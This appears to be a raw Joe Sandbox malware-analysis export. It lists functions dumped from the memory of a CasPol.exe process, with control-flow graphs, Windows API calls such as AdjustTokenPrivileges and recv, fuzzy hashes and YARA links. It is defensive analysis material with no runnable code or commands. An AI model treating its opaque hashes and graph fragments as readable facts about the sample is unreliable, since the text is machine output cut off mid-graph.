                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 20654A98 Relevance: 2.8, Strings: 2, Instructions: 343COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 1703 20654a98-20654ab5 1801 20654ab7 call 1d740606 1703->1801 1802 20654ab7 call 1d7405df 1703->1802 1704 20654abc-20654ac8 1705 20654b14-20654b47 1704->1705 1706 20654aca-20654ad0 1704->1706 1716 20654b4e-20654bc2 1705->1716 1707 20654ad2-20654ad5 1706->1707 1708 20654b0f 1706->1708 1707->1708 1709 20654ad7-20654b03 1707->1709 1708->1705 1715 20654b05-20654b0c 1709->1715 1709->1716 1725 20654bc4-20654bc7 1716->1725 1726 20654bd1-20654bd4 1725->1726 1727 20654bc9-20654bce 1725->1727 1728 20654be5-20654be8 1726->1728 1729 20654bd6-20654bda 1726->1729 1727->1726 1732 20654bf8-20654bfb 1728->1732 1733 20654bea-20654bed 1728->1733 1730 20654be0 1729->1730 1731 20654caa-20654cb3 1729->1731 1730->1728 1734 20654cb9 1731->1734 1735 20654d68 1731->1735 1738 20654c11-20654c14 1732->1738 1739 20654bfd-20654c06 1732->1739 1736 20654c90-20654c93 1733->1736 1737 20654bf3 1733->1737 1742 20654cbe-20654cc1 1734->1742 1740 20654d6d-20654dc0 1735->1740 1736->1740 1741 20654c99-20654ca0 1736->1741 1737->1732 1745 20654c16-20654c18 1738->1745 1746 20654c1b-20654c1e 1738->1746 1743 20654d01-20654d0a 1739->1743 1744 20654c0c 1739->1744 1783 20654de4-20654df0 1740->1783 1784 20654dc2-20654ddd 1740->1784 1749 20654ca5-20654ca8 1741->1749 1751 20654cc3-20654cc5 1742->1751 1752 20654ccc-20654ccf 1742->1752 1743->1740 1750 20654d0c-20654d10 1743->1750 1744->1738 1745->1746 1747 20654c20-20654c23 1746->1747 1748 20654c28-20654c2b 1746->1748 1747->1748 1753 20654c35-20654c38 1748->1753 1754 20654c2d-20654c32 1748->1754 1749->1731 1749->1742 1755 20654d15-20654d18 1750->1755 1757 20654cc7 1751->1757 1758 20654c48-20654c5a 1751->1758 1759 20654cd1-20654cd6 1752->1759 1760 20654cd9-20654cdc 1752->1760 1761 20654cf1-20654cf5 1753->1761 1762 20654c3e-20654c41 1753->1762 1754->1753 1763 20654d25-20654d28 1755->1763 1764 20654d1a-20654d20 1755->1764 1757->1752 1775 20654c5f-20654c62 1758->1775 1759->1760 1765 20654ce3-20654ce6 1760->1765 1766 20654cde 1760->1766 1761->1735 1773 20654cf7 1761->1773 1762->1733 1767 20654c43-20654c46 1762->1767 1768 20654d34-20654d37 1763->1768 1769 20654d2a-20654d2d 1763->1769 1764->1763 1765->1739 1772 20654cec-20654cef 1765->1772 1766->1765 1767->1758 1767->1775 1768->1769 1777 20654d39-20654d3c 1768->1777 1769->1735 1776 20654d2f 1769->1776 1772->1761 1774 20654cfc-20654cff 1772->1774 1773->1774 1774->1743 1774->1755 1779 20654c64-20654c6a 1775->1779 1780 20654c8b-20654c8e 1775->1780 1776->1768 1781 20654d3e-20654d44 1777->1781 1782 20654d4b-20654d4d 1777->1782 1779->1735 1785 20654c70-20654c73 1779->1785 1780->1736 1780->1749 1781->1735 1786 20654d46 1781->1786 1787 20654d54-20654d57 1782->1787 1788 20654d4f 1782->1788 1790 20654df2-20654e11 1783->1790 1791 20654e18-20654e24 1783->1791 1784->1783 1785->1735 1789 20654c79-20654c86 1785->1789 1786->1782 1787->1725 1792 20654d5d-20654d67 1787->1792 1788->1787 1789->1780 1790->1791 1793 20654e26-20654e5d 1791->1793 1794 20654e60-20654e64 1791->1794 1793->1794 1801->1704 1802->1704
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88425754930.0000000020650000.00000040.00000800.00020000.00000000.sdmp, Offset: 20650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_20650000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: ,Q(s$,Q(s
                                                                                                                                    • API String ID: 0-1294912828
                                                                                                                                    • Opcode ID: 42160016484e81b2ed9700b96976563535b74183575604908787bd0229d798b4
                                                                                                                                    • Instruction ID: 24fe6e9de11a8bb01dd2b782030280b778e51f01700086b99f8ee6ce930c0da3
                                                                                                                                    • Opcode Fuzzy Hash: 42160016484e81b2ed9700b96976563535b74183575604908787bd0229d798b4
                                                                                                                                    • Instruction Fuzzy Hash: BAC1D575A003059FDB21CFA8C8807AEBBF2EF85214F1585AAD545EB742DA34ED48CB61
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 20713470 Relevance: 1.7, APIs: 1, Instructions: 155libraryCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 2295 20713470-207134e0 LdrInitializeThunk 2303 207134e6-20713504 2295->2303 2304 2071362d-20713652 2295->2304 2303->2304 2307 2071350a-20713524 2303->2307 2318 20713657-20713660 2304->2318 2311 20713526-20713528 2307->2311 2312 2071352a 2307->2312 2313 2071352d-20713586 2311->2313 2312->2313 2323 20713588-2071358a 2313->2323 2324 2071358c 2313->2324 2325 2071358f-2071362b 2323->2325 2324->2325 2325->2318
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88425915830.0000000020710000.00000040.00000800.00020000.00000000.sdmp, Offset: 20710000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_20710000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 79335d3eaafff25cfb9a488e919e4c154f5f33a3576e18488d7b66abfe275b03
                                                                                                                                    • Instruction ID: 77ab0ea1ecad138d14657a612e5412344f0578f147936749e3ce64b5f7f19e7a
                                                                                                                                    • Opcode Fuzzy Hash: 79335d3eaafff25cfb9a488e919e4c154f5f33a3576e18488d7b66abfe275b03
                                                                                                                                    • Instruction Fuzzy Hash: 7C515374B002159FDB14EBB8D885BAEB7F6BF88240F108929E105DB350EF34E945CBA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1D8AAA7F Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 1D8AAAFF
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88416576921.000000001D8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D8AA000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1d8aa000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AdjustPrivilegesToken
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2874748243-0
                                                                                                                                    • Opcode ID: f7efd883fea3cb782d76770b049da67839fc1bcea78e07c3532eb182bd6eb401
                                                                                                                                    • Instruction ID: 2fcc556f27e049b4736606fea50aa0ceb3d545b596ad069f64dca03d81c16806
                                                                                                                                    • Opcode Fuzzy Hash: f7efd883fea3cb782d76770b049da67839fc1bcea78e07c3532eb182bd6eb401
                                                                                                                                    • Instruction Fuzzy Hash: DF21BC76509380AFDB128F25DC44B62BFB4EF06210F0985DAE9888F563D231A808DB62
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1D8AAAB6 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 1D8AAAFF
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88416576921.000000001D8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D8AA000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1d8aa000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AdjustPrivilegesToken
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2874748243-0
                                                                                                                                    • Opcode ID: 87d4b49474ec389d1260b2139f610799809a530f10f6df632d20bb39dbd9233f
                                                                                                                                    • Instruction ID: 19134d2049165415333c586436d6ebaf268d77ff481651a82d6216db8f3c55e8
                                                                                                                                    • Opcode Fuzzy Hash: 87d4b49474ec389d1260b2139f610799809a530f10f6df632d20bb39dbd9233f
                                                                                                                                    • Instruction Fuzzy Hash: 3E11C2316003449FDB21CF55D884B66FBE4EF04620F08C4AAED498BA52D371E459DF62
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1D8AAFB8 Relevance: 1.6, APIs: 1, Instructions: 50nativeCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • NtQuerySystemInformation.NTDLL ref: 1D8AB015
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88416576921.000000001D8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D8AA000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1d8aa000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InformationQuerySystem
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3562636166-0
                                                                                                                                    • Opcode ID: 7bf2d95d5d592e83021355c75e6f6f040700161737b89f865487ad0d821ff974
                                                                                                                                    • Instruction ID: fb2284d1d87202c4bd0cf6ab24940ca1a78bcf69295e6934e8b260e407d58145
                                                                                                                                    • Opcode Fuzzy Hash: 7bf2d95d5d592e83021355c75e6f6f040700161737b89f865487ad0d821ff974
                                                                                                                                    • Instruction Fuzzy Hash: 6D11A072408380AFC7228F15DC45E52FFB4EF46220F08849EED884B263D276A818CB62
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1D8AA09A Relevance: 1.5, APIs: 1, Instructions: 42networkCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88416576921.000000001D8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D8AA000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1d8aa000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: recv
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1507349165-0
                                                                                                                                    • Opcode ID: 5773d3717884fb61f8395dba79296d4abfa5fb2c6bd046f6d831c4b72d132049
                                                                                                                                    • Instruction ID: d255d3f0bd6ff02bc2b58b5b0800d8def73060dd1b9ed1c326639790cb666fa5
                                                                                                                                    • Opcode Fuzzy Hash: 5773d3717884fb61f8395dba79296d4abfa5fb2c6bd046f6d831c4b72d132049
                                                                                                                                    • Instruction Fuzzy Hash: B001B131500340DFDB20CF55D884B56FBE0FF44720F08C4AAEE498B652D375A058CBA2
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1D8AAFDA Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • NtQuerySystemInformation.NTDLL ref: 1D8AB015
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88416576921.000000001D8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D8AA000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1d8aa000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InformationQuerySystem
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3562636166-0
                                                                                                                                    • Opcode ID: a257e36a891ef1dae14e3253e14d7a8edd201d4f0f6dbca04043bafb772fea3f
                                                                                                                                    • Instruction ID: bcfee6567700a93b2beb31b92787f9bc8e3fa1cd50bf14a7ad9842ebe038eab7
                                                                                                                                    • Opcode Fuzzy Hash: a257e36a891ef1dae14e3253e14d7a8edd201d4f0f6dbca04043bafb772fea3f
                                                                                                                                    • Instruction Fuzzy Hash: 70018B325003849FEB21CF16D885B65FBA0EF48620F08C49AEE580B252C276A458DBA2
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 2065E130 Relevance: 1.2, Instructions: 1181COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88425754930.0000000020650000.00000040.00000800.00020000.00000000.sdmp, Offset: 20650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_20650000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 31928958f53956673779dbf588a0e7e1752641a09da057bf5b5190a00e28c11b
                                                                                                                                    • Instruction ID: 4b2bdfce7678bf0c028acd3c83fbd6a576dc9d5aa8de21486929371c8d720749
                                                                                                                                    • Opcode Fuzzy Hash: 31928958f53956673779dbf588a0e7e1752641a09da057bf5b5190a00e28c11b
                                                                                                                                    • Instruction Fuzzy Hash: 1BA21E70E012288FEB64DFB9C85479DBBF2AF84304F2485A9D509AB390DB359D85CF91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 20658CB8 Relevance: 1.0, Instructions: 954COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88425754930.0000000020650000.00000040.00000800.00020000.00000000.sdmp, Offset: 20650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_20650000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 472249775f159a2a1ae27ba547e1b5da99a742d6918001ce556926ed0e82408a
                                                                                                                                    • Instruction ID: e4ab8a6ea16931774188c69f1f5a39187ece948149aec671497989dcf44dc435
                                                                                                                                    • Opcode Fuzzy Hash: 472249775f159a2a1ae27ba547e1b5da99a742d6918001ce556926ed0e82408a
                                                                                                                                    • Instruction Fuzzy Hash: F6920B74A002298FDB50DFB8C884B9DFBB2BF84304F158699D409AB355DB34AE85CF95
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 20658C9C Relevance: .9, Instructions: 874COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88425754930.0000000020650000.00000040.00000800.00020000.00000000.sdmp, Offset: 20650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_20650000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 8f3641a36b6663344ef2b7a4b74bcdf2ab56afad80b264dbe82778d260a34bdc
                                                                                                                                    • Instruction ID: 5583f733291aa6bb25468cc9451a16ccb7cb0035a37331edfbdb9b411dff6292
                                                                                                                                    • Opcode Fuzzy Hash: 8f3641a36b6663344ef2b7a4b74bcdf2ab56afad80b264dbe82778d260a34bdc
                                                                                                                                    • Instruction Fuzzy Hash: 1A82FB74A00229CFDB50DFA4C884B9DFBB2BF88304F158699D409AB354DB34AE85CF95
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 20658C57 Relevance: .9, Instructions: 872COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88425754930.0000000020650000.00000040.00000800.00020000.00000000.sdmp, Offset: 20650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_20650000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 017d0adca5b9052fbb77efa136e0ef3a969466e5429d0b6a2390815d7c797908
                                                                                                                                    • Instruction ID: 71ec83957a3683088e7a012254d442b6f674654df085900434d73aa2015fcaf4
                                                                                                                                    • Opcode Fuzzy Hash: 017d0adca5b9052fbb77efa136e0ef3a969466e5429d0b6a2390815d7c797908
                                                                                                                                    • Instruction Fuzzy Hash: 04820B74A00229CFDB50DFA4C884B9DFBB2BF88314F158699D409AB354DB34AE85CF95
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 20656040 Relevance: .8, Instructions: 829COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88425754930.0000000020650000.00000040.00000800.00020000.00000000.sdmp, Offset: 20650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_20650000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 7e544da53f0c6a7da3300e063bbf995cba0a34fb16a18a3d64004fdb244c881a
                                                                                                                                    • Instruction ID: dab073e92a1cd96b9a4adabe7eb443e94f8d65471060d47412460a7a655221b8
                                                                                                                                    • Opcode Fuzzy Hash: 7e544da53f0c6a7da3300e063bbf995cba0a34fb16a18a3d64004fdb244c881a
                                                                                                                                    • Instruction Fuzzy Hash: 63625135E00624CFDB25DFA4C844BDEBBF2AF89300F1585A9E909AB261DB719E45CF41
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 2065C800 Relevance: .7, Instructions: 657COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88425754930.0000000020650000.00000040.00000800.00020000.00000000.sdmp, Offset: 20650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_20650000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 86ed7eee0c0f1b82baa931ce9c3c93d56cc441bc1f336e1261c175f84c32876d
                                                                                                                                    • Instruction ID: 750b6221eb9a04bda6cc763a39a298b54a48f87f2e7d0c01eb954b3ba6d1376b
                                                                                                                                    • Opcode Fuzzy Hash: 86ed7eee0c0f1b82baa931ce9c3c93d56cc441bc1f336e1261c175f84c32876d
                                                                                                                                    • Instruction Fuzzy Hash: C6327270B042049FEB14CBB8C895BDEBBF3AB85324F25846AD105EB391DA35EC45C792
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 2065AC74 Relevance: .6, Instructions: 643COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88425754930.0000000020650000.00000040.00000800.00020000.00000000.sdmp, Offset: 20650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_20650000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 314be05afdbe5737fd724f578d1ae34b6fc6871b61658428e79d9962e5753185
                                                                                                                                    • Instruction ID: 8cb549b42554bb83d148a16265555b1f9d344c6dbd5139036a830e0dbdde6af8
                                                                                                                                    • Opcode Fuzzy Hash: 314be05afdbe5737fd724f578d1ae34b6fc6871b61658428e79d9962e5753185
                                                                                                                                    • Instruction Fuzzy Hash: 65328070E04255CFEB24DFB8C89479DBBB2AF85304F24846AD10A9F396DA35DC49CB52
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 20650070 Relevance: .6, Instructions: 627COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88425754930.0000000020650000.00000040.00000800.00020000.00000000.sdmp, Offset: 20650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_20650000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 19ed05b40e0a4022181f00baa4e3408862793abc7d547a739cacc585d39c833c
                                                                                                                                    • Instruction ID: 636aa33df6e365904f65b4f4a12e4b1c17cf72aebea4fe01eaf047a428701768
                                                                                                                                    • Opcode Fuzzy Hash: 19ed05b40e0a4022181f00baa4e3408862793abc7d547a739cacc585d39c833c
                                                                                                                                    • Instruction Fuzzy Hash: 76329F74B002158FEB14DBB8C894B9EBBF2AF88314F25846AD505EB396DB74EC05CB51
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC56F68 Relevance: .4, Instructions: 409COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 453067073b016d887837c670dc278c69b12e64cb1e5023ab35ff7e45018d8c00
                                                                                                                                    • Instruction ID: 80710826b82ed6e8fe3c379ec2e7fb41560b305a8723fbbf9c2b5bbfb86a0b10
                                                                                                                                    • Opcode Fuzzy Hash: 453067073b016d887837c670dc278c69b12e64cb1e5023ab35ff7e45018d8c00
                                                                                                                                    • Instruction Fuzzy Hash: 26E17131F003149BEB54DFB9C8947AEBBF6AFC4304F248929D506AB290DF35A841DB95
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 20654410 Relevance: 5.3, Strings: 4, Instructions: 318COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 1474 20654410-2065444a 1476 20654450-20654457 1474->1476 1477 20654603-206546aa call 20654859 * 2 1474->1477 1476->1477 1478 2065445d-20654464 1476->1478 1493 206546b0-206546b3 1477->1493 1494 2065477f 1477->1494 1478->1477 1479 2065446a-20654471 1478->1479 1479->1477 1481 20654477-2065447e 1479->1481 1481->1477 1482 20654484-2065448b 1481->1482 1482->1477 1484 20654491-20654498 1482->1484 1484->1477 1485 2065449e-206544a5 1484->1485 1485->1477 1487 206544ab-206544b2 1485->1487 1487->1477 1488 206544b8-206544bf 1487->1488 1488->1477 1490 206544c5-206544cc 1488->1490 1490->1477 1492 206544d2-206544d9 1490->1492 1492->1477 1495 206544df-20654501 1492->1495 1493->1494 1496 206546b9-206546f8 1493->1496 1497 20654784-206547b6 1494->1497 1500 20654507-2065450a 1495->1500 1501 206545e1-206545f4 1495->1501 1507 206547de-20654811 1496->1507 1508 206546fe-20654704 1496->1508 1527 206547bd-206547d7 1497->1527 1500->1501 1503 20654510-20654522 1500->1503 1518 206545f9-20654602 1501->1518 1503->1501 1510 20654528-2065455e 1503->1510 1533 20654818 1507->1533 1508->1494 1512 20654706-20654709 1508->1512 1510->1501 1529 20654564-20654567 1510->1529 1512->1494 1515 2065470b-20654759 1512->1515 1515->1527 1528 2065475b-20654765 1515->1528 1527->1507 1528->1497 1531 20654767-2065477a 1528->1531 1529->1501 1534 20654569-2065456c 1529->1534 1531->1533 1555 2065481e call 1d740606 1533->1555 1556 2065481e call 1d7405df 1533->1556 1534->1501 1536 2065456e-20654581 1534->1536 1536->1501 1542 20654583-20654597 1536->1542 1538 20654824 1541 20654825 1538->1541 1541->1541 1542->1501 1544 20654599-206545c1 1542->1544 1550 206545c3 call 20654410 1544->1550 1551 206545c3 call 20654610 1544->1551 1552 206545c3 call 2065440f 1544->1552 1547 206545c9-206545df 1547->1518 1550->1547 1551->1547 1552->1547 1555->1538 1556->1538
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88425754930.0000000020650000.00000040.00000800.00020000.00000000.sdmp, Offset: 20650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_20650000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: ,Q(s$,Q(s$,Q(s$QHe
                                                                                                                                    • API String ID: 0-3245023618
                                                                                                                                    • Opcode ID: 40009869dee6b3fe953d672b74eb5112461d711514b2a9d0897602bb1243157c
                                                                                                                                    • Instruction ID: 94d8f31c120b44e7494d3dcd963aac5a55b1af3c3d32fe5477cf01ccdf8200e2
                                                                                                                                    • Opcode Fuzzy Hash: 40009869dee6b3fe953d672b74eb5112461d711514b2a9d0897602bb1243157c
                                                                                                                                    • Instruction Fuzzy Hash: 22B1F631B043149FDB14DBB8CC90BAEBBF2AF85204F15856DD60AABB91DB34AD05CB51
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 20654859 Relevance: 5.2, Strings: 4, Instructions: 246COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 1557 20654859-20654885 1695 20654888 call 1d740606 1557->1695 1696 20654888 call 20160f8f 1557->1696 1697 20654888 call 1d7405df 1557->1697 1698 20654888 call 20160fca 1557->1698 1558 2065488d-20654899 1559 2065489b-206548cd 1558->1559 1560 206548da-20654913 1558->1560 1567 206548cf-206548d7 1559->1567 1568 2065491b-20654987 1559->1568 1560->1568 1699 20654989 call 20654859 1568->1699 1700 20654989 call 20654a98 1568->1700 1577 2065498f-20654a37 1589 20654a46-20654ab5 1577->1589 1590 20654a39-20654a43 1577->1590 1701 20654ab7 call 1d740606 1589->1701 1702 20654ab7 call 1d7405df 1589->1702 1598 20654abc-20654ac8 1599 20654b14-20654b47 1598->1599 1600 20654aca-20654ad0 1598->1600 1610 20654b4e-20654bc2 1599->1610 1601 20654ad2-20654ad5 1600->1601 1602 20654b0f 1600->1602 1601->1602 1603 20654ad7-20654b03 1601->1603 1602->1599 1609 20654b05-20654b0c 1603->1609 1603->1610 1619 20654bc4-20654bc7 1610->1619 1620 20654bd1-20654bd4 1619->1620 1621 20654bc9-20654bce 1619->1621 1622 20654be5-20654be8 1620->1622 1623 20654bd6-20654bda 1620->1623 1621->1620 1626 20654bf8-20654bfb 1622->1626 1627 20654bea-20654bed 1622->1627 1624 20654be0 1623->1624 1625 20654caa-20654cb3 1623->1625 1624->1622 1628 20654cb9 1625->1628 1629 20654d68 1625->1629 1632 20654c11-20654c14 1626->1632 1633 20654bfd-20654c06 1626->1633 1630 20654c90-20654c93 1627->1630 1631 20654bf3 1627->1631 1636 20654cbe-20654cc1 1628->1636 1634 20654d6d-20654dc0 1629->1634 1630->1634 1635 20654c99-20654ca0 1630->1635 1631->1626 1639 20654c16-20654c18 1632->1639 1640 20654c1b-20654c1e 1632->1640 1637 20654d01-20654d0a 1633->1637 1638 20654c0c 1633->1638 1677 20654de4-20654df0 1634->1677 1678 20654dc2-20654ddd 1634->1678 1643 20654ca5-20654ca8 1635->1643 1645 20654cc3-20654cc5 1636->1645 1646 20654ccc-20654ccf 1636->1646 1637->1634 1644 20654d0c-20654d10 1637->1644 1638->1632 1639->1640 1641 20654c20-20654c23 1640->1641 1642 20654c28-20654c2b 1640->1642 1641->1642 1647 20654c35-20654c38 1642->1647 1648 20654c2d-20654c32 1642->1648 1643->1625 1643->1636 1649 20654d15-20654d18 1644->1649 1651 20654cc7 1645->1651 1652 20654c48-20654c5a 1645->1652 1653 20654cd1-20654cd6 1646->1653 1654 20654cd9-20654cdc 1646->1654 1655 20654cf1-20654cf5 1647->1655 1656 20654c3e-20654c41 1647->1656 1648->1647 1657 20654d25-20654d28 1649->1657 1658 20654d1a-20654d20 1649->1658 1651->1646 1669 20654c5f-20654c62 1652->1669 1653->1654 1659 20654ce3-20654ce6 1654->1659 1660 20654cde 1654->1660 1655->1629 1667 20654cf7 1655->1667 1656->1627 1661 20654c43-20654c46 1656->1661 1662 20654d34-20654d37 1657->1662 1663 20654d2a-20654d2d 1657->1663 